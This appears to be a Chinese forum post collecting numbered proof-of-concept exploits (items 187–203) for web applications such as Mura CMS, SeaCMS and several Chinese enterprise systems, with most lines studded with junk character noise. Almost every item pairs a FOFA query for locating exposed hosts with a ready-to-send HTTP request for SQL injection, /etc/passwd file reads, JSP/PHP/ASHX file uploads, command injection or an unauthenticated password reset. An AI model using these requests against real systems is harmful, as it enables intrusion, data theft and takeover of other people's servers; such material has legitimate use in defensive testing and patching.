; g5 A. p& x5 Y* ]+ PFOFA:title=="DataCube3"+ v7 v8 c8 @3 p3 ?& d) a$ \+ o% a
POST /admin/pr_monitor/getting_index_data.php HTTP/1.15 G8 N4 C. }% V( A+ d
Host: your-ip6 B, U1 ~1 y- ], i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.01 I" \' U, W3 W# d6 M6 I. g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8( T' t) S! C" W n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ ?/ `4 s+ Q: m/ sAccept-Encoding: gzip, deflate
/ y# Q& ?/ j! N4 z& C, YConnection: close
0 y2 z2 G" N8 W! i9 O! j( YContent-Type: application/x-www-form-urlencoded
4 A$ U- I$ m3 c, U3 ~4 x, h9 S
5 ]3 O' I+ G% M* f+ t( _6 hreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14505 F7 G0 ~- M r$ x
8 W# \1 i w/ x# E( Z8 W+ ^0 {7 F
0 b a( o5 P# d! W& a) y187. Mura CMS processAsyncObject SQL注入' J4 }) {. T1 C7 P) \1 P/ @7 z- \
CVE-2024-32640
0 K. g* v5 P) D6 H2 n. zFOFA:"Mura CMS"
( x2 E$ K9 ]+ z% y& a3 a% KPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
. O$ V% ]# a4 G+ L4 _9 K+ X+ X% yHost: your-ip4 Y4 C/ _* _2 V4 R
Content-Type: application/x-www-form-urlencoded' o/ D" c& ]$ n9 ~) J( H5 e
Z5 {2 c4 }; o C
3 J" W* {9 A3 W3 u8 I$ h4 Q
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
9 T0 T( D" B/ g, {( _
# y( Y! z9 r+ G W* O% r* c' v- U
- @6 F$ _* l, m% o2 r, `188. 叁体-佳会视频会议 attachment 任意文件读取: p! B6 ]$ m; O/ L7 ^+ m
version <= 3.9.7
! H, p1 P% i( G2 q# sFOFA:body="/system/get_rtc_user_defined_info?site_id"! i' w& D8 P( @8 ]& h8 ^, u$ C/ U5 Q
GET /attachment?file=/etc/passwd HTTP/1.13 h. j2 F7 J% l# b
Host: your-ip# D" Q/ | `! O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36) E. A3 o7 b, R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 w* B+ p$ `7 |$ F: S& @, L. R
Accept-Encoding: gzip, deflate
9 n& t; ~" w5 _Accept-Language: zh-CN,zh;q=0.9,en;q=0.8# V/ B0 ^( |" \# r( L
Connection: close
& B- u9 {& H g, W
+ ~* \* L' z' d8 T
, l8 z: ]% ]& R* B8 N6 D0 c7 U189. 蓝网科技临床浏览系统 deleteStudy SQL注入) i* g( C# [, _+ A
FOFA:app="LANWON-临床浏览系统"
: M) T; v4 L0 {* nGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
: `5 g$ T' O3 g5 Y BHost: your-ip
* @( r( q& A/ u/ z( YUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
& I( e8 Y; R. H4 T5 E( j0 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 x3 N7 N/ l$ J: kAccept-Encoding: gzip, deflate
+ \& M1 ?6 Z- P, i: i2 i/ ~Accept-Language: zh-CN,zh;q=0.96 f) p4 A5 @' c5 [( {% r2 x5 `
Connection: close( [/ ?) G3 F* @, r0 Z8 L
( N2 B8 M2 |* F# G: I, ?4 D# h& D# G" [# P& F9 [2 W4 H
190. 短视频矩阵营销系统 poihuoqu 任意文件读取4 {6 T" H3 z W2 ~
FOFA:title=="短视频矩阵营销系统"
! w- z- i6 x" T2 U) aPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
2 @# N! e3 ^! F3 a% l) _. l, U$ zHost: your-ip9 r! u* ?! h! M- H1 P. o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
: z( s( f6 h7 f! h' w2 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9! `) g# b; X) s4 }- C" Q
Content-Type: application/x-www-form-urlencoded) X4 s' e6 [' ^3 c( M/ E. l
Accept-Encoding: gzip, deflate
) R8 i' N6 T5 q# b) _Accept-Language: zh-CN,zh;q=0.9
$ a( L2 {, A9 C) D
' e" V! k+ Z4 ~% Dpoi=file:///etc/passwd
$ \- c3 b3 I" c5 {. [& v# t4 i9 N) h! h6 S5 b/ x* O/ M, d
% s, A5 K! j) j+ U) f3 ]
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入5 `& c- ?& p, {5 R8 q$ o7 W
FOFA:body="/CDGServer3/index.jsp"0 d# Q ?5 w; T) |: v- i. I
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
( r' M" r9 }5 y" J( ^5 Y! c& U1 WHost: your-ip
& z, Y) U2 J( O, Q2 l4 @, d$ t: KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( m* [ Y8 E1 G2 S6 V% X' UContent-Type: application/x-www-form-urlencoded2 A! I- ^! ~' T. l0 C
( X; ?! H9 L8 |command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
* z" @5 t( g. x+ k. }
% t4 n/ g2 }$ i: } O. L( e. g7 t/ O6 _$ Q0 q) n& S. {
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
8 l* }/ ~# C. T6 y) r) C6 H" }FOFA:title="用户登录_富通天下外贸ERP"
& l% ]; C. b- X5 K' o x+ Q: Z( yPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1/ a2 C6 E1 ~: z" S% _
Host: your-ip
& w" Z+ E) f/ x* mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.368 y) r) d$ }8 @
Content-Type: application/x-www-form-urlencoded* V. S2 a2 M' F9 k! ?7 x( Y) b
4 s; T. D! g5 w& x+ d
) h; h2 w. D) d. b. b: w* n$ P
<% @ webhandler language="C#" class="AverageHandler" %>, Y6 c# E* S0 q( T U) u- C
using System;* [1 Y' d$ Y' h; m. p3 X' v6 \! s
using System.Web;
/ D9 t- E$ s Q2 X2 Y$ Vpublic class AverageHandler : IHttpHandler3 o" Y( O5 W% H9 p" T" H0 H
{& n \4 }" i4 ?; M6 i5 j3 U
public bool IsReusable- _! B* D+ z# j' n/ X. l @
{ get { return true; } }
( D$ [) W# V6 ]7 fpublic void ProcessRequest(HttpContext ctx)2 F* L, D$ s) ]7 v* x/ g
{
& \% W; D9 |, S* Bctx.Response.Write("test");" m& T9 [4 x& W6 |. m2 r0 `
}' K5 }9 K0 y; m
}
9 y& L! J+ e0 S# w u9 b1 _. B% a& E" I
# o8 }; T* L0 W a) l193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
4 q: c/ l3 \: G, wFOFA:body="山石云鉴主机安全管理系统"" {0 T' B& b6 J% o( P$ J1 ?
GET /master/ajaxActions/getTokenAction.php HTTP/1.16 w' K" s3 P7 s, O1 \+ `4 m- s3 ?
Host:
0 I# U/ `) L% N. aCookie: PHPSESSID=2333333333333;9 J0 U# |1 l5 G
Content-Type: application/x-www-form-urlencoded
* V; ` {; }. S# K& e0 q1 q& a6 qUser-Agent: Mozilla/5.0' ^9 P& A5 s6 `; H" x; k% K
0 b& n6 ]! b! i p+ V2 O( ]# L. e8 H: ^2 Y% t; V2 w4 N
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1' B9 C( H; X( J+ t
Host:, n* U9 S3 M3 ?7 Z! Z a! {# B
User-Agent: Mozilla/5.0
0 I" p7 ~0 R% _. XAccept-Encoding: gzip, deflate
* ~/ w4 M1 _, X( G# e# tAccept: */*
. J3 l9 l- G9 [ }2 XConnection: close
& w! M; h" I$ KCookie: PHPSESSID=2333333333333;
v$ @2 g2 Q5 r8 \. K5 q4 \Content-Type: application/x-www-form-urlencoded
/ U# B: s4 V& S1 }* U8 L! eContent-Length: 845 x# U% F/ _# R) c- k
+ y1 r8 U7 r0 W' o9 T' H4 g% Z
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
1 h5 B4 i9 c7 ^$ ~0 Y+ }2 R
7 C# N2 E6 ]6 r, g) j4 F. i) R3 m1 C; g2 k: T) u+ k
GET /master/img/config HTTP/1.1
; Y5 l0 U+ Y- c+ {Host:
) z# q3 w7 w2 l2 YUser-Agent: Mozilla/5.0& Y m6 G/ r0 b/ a
' P5 k3 M( h( B
$ T$ ?; |7 X* z- r194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
% d ?4 Y9 j5 p% lFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
j8 |) C9 j8 d8 q
- p8 P& K8 m' `9 SPOST /servlet/uploadAttachmentServlet HTTP/1.1. P5 Y* Q! V$ w5 F* \
Host: host
2 b4 Q; |% ]5 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
% W5 T- j! S/ b: j' bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. V4 m4 H f# a9 a' u ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
H4 q6 b" w: {9 @6 m" V6 F* ~- \- HAccept-Encoding: gzip, deflate, ^( k, A+ u0 B
Connection: close" b* ~0 q, x" e X
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
0 b% G: J% t/ ^( |------WebKitFormBoundaryKNt0t4vBe8cX9rZk6 K* z8 m* T L$ Z* {2 ?
1 B& _* a) F, @9 O& iContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"% ]/ U$ R- B" Z6 y( J$ o0 n* H
Content-Type: text/plain
& M7 X& ^+ Y) S/ c<% out.println("hello");%>
- L7 ?( j0 _6 Y3 P( C" V3 J# E------WebKitFormBoundaryKNt0t4vBe8cX9rZk, v. O2 k7 O, ]+ e$ Z6 d4 B
Content-Disposition: form-data; name="json"8 ~: r+ g- t" n* `2 b( t; m$ @
{"iq":{"query":{"UpdateType":"mail"}}}6 W" x" g* [/ H, \. e7 Y
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
. |- D( O$ e% j) v4 n& d
$ i0 V4 E0 F& N4 l6 H0 X6 e9 q
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
* O9 g. ^7 Z* a$ k0 d5 EFOFA:title=="飞鱼星企业级智能上网行为管理系统
4 H' {3 s! B% m' _" J4 Q: nPOST /send_order.cgi?parameter=operation HTTP/1.1) H' m# t" n+ d2 }
Host: 127.0.0.1, Q/ C: W a+ Y8 y1 x
Pragma: no-cache, G2 F( M. d) a* R1 G8 ~! y
Cache-Control: no-cache
& d- L6 s% W7 P. X1 }3 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
8 `: W# w; q: ~1 N- i' hAccept: */*
* } F6 i1 g6 k! \/ q5 NAccept-Encoding: gzip, deflate
* `8 f" b. b3 G$ ?Accept-Language: zh-CN,zh;q=0.9- f1 T/ ]0 U: h, D) l
Connection: close+ k$ _! H9 e# k( q( g6 D3 D
Content-Type: application/x-www-form-urlencoded [$ a. b% `2 T7 |
Content-Length: 68
0 h! U$ M& c+ x* Z( s+ X' I! {, z! f* z' |' W" q% L; {5 G
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
& w4 W% t2 Z+ L: P4 Z$ y
4 u' d. m- a+ `+ g( g' J- D( F! l0 z P$ u' ]. G& ], v
196. 河南省风速科技统一认证平台密码重置) ^3 t4 P& O- ]' J
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
' |8 B7 ?( L- G, d* Y+ \& F- T; H, GPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
8 A. l% N1 U+ O5 u) a* hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.363 N! M" C. E \( n/ {6 o/ ?
Content-Type: application/json;charset=UTF-8
, B, ^8 ?; N0 j3 y# z. y, oX-Requested-With: XMLHttpRequest
9 `' U; a7 |5 o- V' {+ LHost:
& ~) `" l" r1 ]: QAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.22 {$ S, `+ y2 m3 h& ?1 B/ m' r
Content-Length: 456 Z- W) S4 @7 } c- b
Connection: close
$ x4 F4 P4 g2 @! T ^, G7 P6 r$ e% h; H1 {
{"xgh":"test","newPass":"test666","email":""}
7 `0 {+ d3 D# F. x) [5 y" m" E0 S. n, m
* i4 R; p& \% K1 ?
0 M" s- q/ [/ c2 b1 U/ H0 T197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入: k: ~: |! C+ D5 Q/ {
FOFA:app="浙大恩特客户资源管理系统"
2 M* x+ j2 `) z1 l6 T" ~1 mGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1) l+ R7 _7 C+ w5 d5 C+ g6 @% Q
Host:# n7 i* j1 a% d u" `. q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
# U. o4 ?0 z$ U; k+ k* vAccept-Encoding: gzip, deflate' d _( Y. A( }1 P
Connection: close5 x3 x5 i% O2 F3 N
& i# r+ Z y z$ t3 Z9 ?; I j% n8 _% |; Q7 z$ d6 V
1 d# B( z$ i# O1 l
198. 阿里云盘 WebDAV 命令注入
% O* B* y! ?5 K" z \2 FCVE-2024-29640; r& S' e; O1 {, t9 i5 L
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1/ H) d- p& w. O! L8 l& x$ K
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
( [, \* t. h+ p( eAccept: */*
& H( P% \" Z; @5 `/ }Accept-Encoding: gzip, deflate. | n+ ]$ V; |4 G9 S4 }( b
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
1 A0 U6 Q( J2 W O5 sConnection: close2 W) l; b% B' B( x& [
6 G& D8 W- f3 y3 G% n( W5 P) a" z% M4 }/ K
199. cockpit系统assetsmanager_upload接口 文件上传) c6 C T; \3 d% h9 R; x- C: [
% A% l, ` [4 K
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:* U$ | @, f: ^- W$ F# W
GET /auth/login?to=/ HTTP/1.1
6 ^! T& r: Z! ]6 B+ [: q
+ {8 t/ N) J7 g d* ?3 }响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"! R+ X* l0 o* ~( ]3 J# a2 S
8 i; @5 X T1 d1 B# o5 \1 n2.使用刚才上一步获取到的jwt获取cookie:
( h s% ?8 d7 F$ G" f q1 s2 v3 L
2 K6 \. y1 o# K2 ?: u; a; ~POST /auth/check HTTP/1.1
# R) o9 e9 L- P, z7 b: K* V2 wContent-Type: application/json& u* \9 Q9 j1 [" G: t7 G
% r; J2 o" X- X
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}3 i& _ q8 Y) `: e
: w% W( E+ W7 S# ?( P# V; z
响应:200,返回值:" R1 T6 U7 ?7 J$ ]7 b A" H$ `
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
5 v% i) P _* `8 ?- HFofa:title="Authenticate Please!"
- n5 I( H. }2 p6 [3 S: E. OPOST /assetsmanager/upload HTTP/1.19 z1 O8 c$ { F2 B% r' q
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3( F% K# K6 Q2 m3 G# o* `
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92/ t% t J; i& {4 ]. G1 ^
{: T" R3 M/ Q5 {6 z) k* ?% J& ]2 R-----------------------------36D28FBc36bd6feE7Fb3( O' D2 x' b& B, O
Content-Disposition: form-data; name="files[]"; filename="tttt.php". J" r. L5 a- G, K, ~
Content-Type: text/php
- ^- b1 ~+ N: |8 s( u) u( B- t3 H; |1 [/ J5 y9 {3 B; V9 N
<?php echo "tttt";unlink(__FILE__);?>4 e, P! u; L2 k
-----------------------------36D28FBc36bd6feE7Fb3! \% x! @3 r1 c/ G
Content-Disposition: form-data; name="folder"
' E1 J B$ ^$ A2 J9 L
6 ]/ K" ]# b" m: `. p5 D+ |3 O) e-----------------------------36D28FBc36bd6feE7Fb3--
$ D4 u9 b) y! s7 Z5 o* B3 c* {
" S$ D0 ^+ ~ R! |
. b& A; N; X' P. ^3 C2 F/storage/uploads/tttt.php" P8 d. V6 d5 }, L: g+ c
9 V' u0 h+ \" V( E2 c* ~% k* X200. SeaCMS海洋影视管理系统dmku SQL注入
, z7 e5 Z$ b5 W1 J' z5 [FOFA:app="海洋CMS"6 ]8 j9 m! y7 t' z( T
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
6 d, @& V$ t2 Z ?7 B" ]* s+ |Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
4 S4 s z( u! [1 ` v5 [1 j* g: `Upgrade-Insecure-Requests: 1& X' \/ T! _5 H& ]" y1 _0 g
Cache-Control: max-age=0
6 F* [" _& k' ]9 o, PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% L! y' {. B/ o) u- K C6 p6 aAccept-Encoding: gzip, deflate* j1 y; Y9 G1 N% J3 n6 Y
Accept-Language: zh-CN,zh;q=0.9# _5 ], p7 N, ]
1 _7 C' n1 E6 }) b$ Y* x. F' _, \
/ r Y" s6 V, I. \" B. o8 ~4 K# i201. 方正全媒体新闻采编系统 binary SQL注入
# L2 h$ ]2 S t& N; C" W: AFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
. ?2 e) d8 @3 L0 N7 s% L3 hPOST /newsedit/newsplan/task/binary.do HTTP/1.1
/ e( T; ?# t- q, }Content-Type: application/x-www-form-urlencoded
- o, v1 K% B4 V! E0 f2 U4 }# _" WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) K, F# T f4 y+ L. K( RAccept-Encoding: gzip, deflate
. l) k+ ]/ C' L0 m9 }# FAccept-Language: zh-CN,zh;q=0.9
7 b. U- U; g5 JConnection: close
) m$ o! e5 `' _/ \7 d4 E: t. i0 b" H# y# a
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
" H- g$ E2 B$ l0 j
* [4 {( z: K/ m0 }; T
i; y$ x ~& F( q202. 微擎系统 AccountEdit任意文件上传' F; [6 u( l1 u: w
FOFA:body="/Widgets/WidgetCollection/"% x G) e8 o) @7 n" Q
获取__VIEWSTATE和__EVENTVALIDATION值
( w3 w2 e8 N7 ^ Y" `9 `GET /User/AccountEdit.aspx HTTP/1.19 H+ u0 j/ F# I( K
Host: 滑板人之家/ A2 r: g, [4 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
% l9 O3 k. B8 H3 MContent-Length: 0
" Y" \& _% ?! Z: i( n6 U
- s& U d1 x* _& ?% j8 N# @
1 l# U% V5 {$ A3 Y6 u替换__VIEWSTATE和__EVENTVALIDATION值' v3 Z6 d8 o' s( P. m( @( {
POST /User/AccountEdit.aspx HTTP/1.1
+ d4 r2 \! D9 \- k$ n* QAccept-Encoding: gzip, deflate, br3 Y+ r) @9 ] e4 N0 a% W, j
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
7 t5 N1 ]0 M& I- i# v' w- K l$ q/ Q' O) C: p% h
-----------------------------786435874t38587593865736587346567358735687# D) n$ J. K; K5 T: A( l* E
Content-Disposition: form-data; name="__VIEWSTATE", h. Y P' y3 E$ z$ Z& e4 M5 P% j
% v* J7 b8 o. c0 c. e( x9 n4 \__VIEWSTATE
1 t7 B! w9 |- Z" |-----------------------------786435874t38587593865736587346567358735687
: d' l8 R# O) c: P. K/ ?Content-Disposition: form-data; name="__EVENTVALIDATION"% t6 G( A. T" k z4 }' x
7 m4 G$ V' D, Y& I% H8 Y$ T
__EVENTVALIDATION3 [9 T# v* ^5 J1 M3 R+ p
-----------------------------786435874t385875938657365873465673587356879 w: H9 m. H) x0 i0 C
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
# h: B/ E0 Y& Q; b+ q) E5 tContent-Type: text/plain% A# w* Q" P' m2 ^' g3 W
1 Y4 t6 i+ n. M+ y: T: Q! y
Hello World!: K1 S1 `+ F& j2 |. u0 z
-----------------------------786435874t38587593865736587346567358735687
2 Z5 F$ s' L0 ~' h$ J. uContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload". t: x0 j9 ?. c0 `* y8 D5 x- P
$ `) B# Y: H$ H$ ]* F4 J: \5 @上传图片
' ] ~) q2 B3 d-----------------------------786435874t38587593865736587346567358735687
. W8 I! L. k$ A, d# G! Q2 U1 x2 cContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
3 E ^$ e6 T: g5 |2 N: }, J% c4 L# M# b. ?; g( x3 f
9 R, z# ]7 D/ S/ j) w/ R-----------------------------786435874t38587593865736587346567358735687
: c) Y& k, \. Y2 G( v+ f! QContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"5 J! a1 E/ R' Y f5 U2 v! [
* p( \9 x3 l4 N
3 C/ i# w$ F" m: w+ U2 _
-----------------------------786435874t38587593865736587346567358735687--: i5 ]6 x: z: I9 U
/ S1 F# A1 \4 f9 I
: _, m: S6 t3 X7 q1 x, V* P) ^& v/_data/Uploads/1123.txt
, j( T- W" V0 D& _+ V ^! \( w: }& m' ?: _7 M Y7 G; p/ P
203. 红海云EHR PtFjk 文件上传
, Q7 j S/ `$ |- KFOFA:body="RedseaPlatform"6 {3 ~! ^, ^1 A3 f
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.15 R: k* G- I! m. h% Q' k _; K
Host: x.x.x.x
( I$ N# h- L0 x) p. g0 T; w7 IAccept-Encoding: gzip
" J& [* ^/ I: u- l$ n! aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 a. c1 A2 L6 ]1 AContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
! E! g/ b- d* C$ d0 @; B5 C3 C9 [) lContent-Length: 210$ ~. L4 W) G7 S5 _7 y0 t* {- n
* o6 A! O L: h$ C0 ]8 \------WebKitFormBoundaryt7WbDl1tXogoZys4
- |( h. g0 I! xContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
" b+ h W4 ], pContent-Type:image/jpeg# r( Z: l$ [# G
/ S1 [3 F8 A4 [ V( J/ i<% out.print("hello,eHR");%>! I+ f4 @2 s+ ]' O* H" J
------WebKitFormBoundaryt7WbDl1tXogoZys4--
8 Q5 U- P$ y3 _& }) b" P- J: v% Y: d' ~8 B. b1 b
A. v5 n3 U3 x# q
% @6 H% M. g5 p2 r' v4 E+ m0 k: T1 ~
" B$ N8 D4 x8 V1 V$ I
) C$ K8 F' V% L) N
|
发表于 2024-6-5 14:31:29
收藏
支持
反对